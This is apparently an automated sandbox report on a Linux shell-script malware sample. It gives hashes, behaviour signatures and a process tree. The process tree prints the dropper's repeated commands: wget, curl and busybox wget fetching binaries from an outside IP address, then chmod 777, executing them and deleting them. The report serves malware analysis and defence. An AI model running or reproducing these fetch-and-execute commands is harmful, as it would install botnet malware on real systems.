Analysis
-
max time kernel
74s -
max time network
76s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/11/2024, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
-
Size
10KB
-
MD5
77bee17b866cc1fd41dd0e6795516a37
-
SHA1
fbe900100ffafc804c69a94b5ee81405100c02e5
-
SHA256
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f
-
SHA512
6284423f5b87140261dee3ec564d00d38f4dd59dd41f86a9d342027230a4012db3224b4cb8e9341a4a30ffcb73b822319b88a65d51c55678886b6a708fa62d4d
-
SSDEEP
192:YnrtGG7NhRmOJQM4+2IJ7Rk8UD+u0KCaHHRYbAQrHB+GvrHB+GRnrtGGJNhRmOuX:8NhRmOJQM4+xJ7dfKOAQrHB+GvrHB+Gy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 748 chmod 838 chmod 941 chmod 953 chmod 965 chmod 971 chmod 860 chmod 911 chmod 983 chmod 818 chmod 893 chmod 977 chmod 872 chmod 887 chmod 917 chmod 923 chmod 929 chmod 947 chmod 755 chmod 899 chmod 905 chmod 959 chmod 783 chmod 812 chmod 866 chmod 881 chmod 935 chmod 989 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n 749 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr 756 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij 784 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR 813 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK 819 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll 839 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD 861 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd 867 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv 873 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI 882 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 888 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH 894 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb 900 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN 906 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb 912 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN 918 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n 924 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr 930 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij 936 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR 942 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK 948 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll 954 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv 960 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI 966 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 972 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH 978 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD 984 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd 990 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 curl File opened for modification /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK curl File opened for modification /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD curl File opened for modification /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv curl File opened for modification /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR curl File opened for modification /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI curl File opened for modification /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr curl File opened for modification /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI curl File opened for modification /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr curl File opened for modification /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN curl File opened for modification /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN curl File opened for modification /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH curl File opened for modification /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD curl File opened for modification /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd curl File opened for modification /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH curl File opened for modification /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb curl File opened for modification /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK curl File opened for modification /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv curl File opened for modification /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n curl File opened for modification /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij curl File opened for modification /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij curl File opened for modification /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll curl File opened for modification /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb curl File opened for modification /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR curl File opened for modification /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll curl File opened for modification /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 curl File opened for modification /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd curl File opened for modification /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n curl
Processes
-
/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh1⤵PID:718
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:726
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:747
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:751
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:752
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:754
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:759
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:760
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:777
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:787
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:788
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:809
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:817
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:831
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:842
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:843
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:859
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:865
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:871
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:880
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:886
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:892
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:898
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:904
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:910
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:916
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:922
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:925
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:926
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:928
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:931
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:932
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:934
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:937
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:938
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:940
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:943
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:944
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:946
-
-
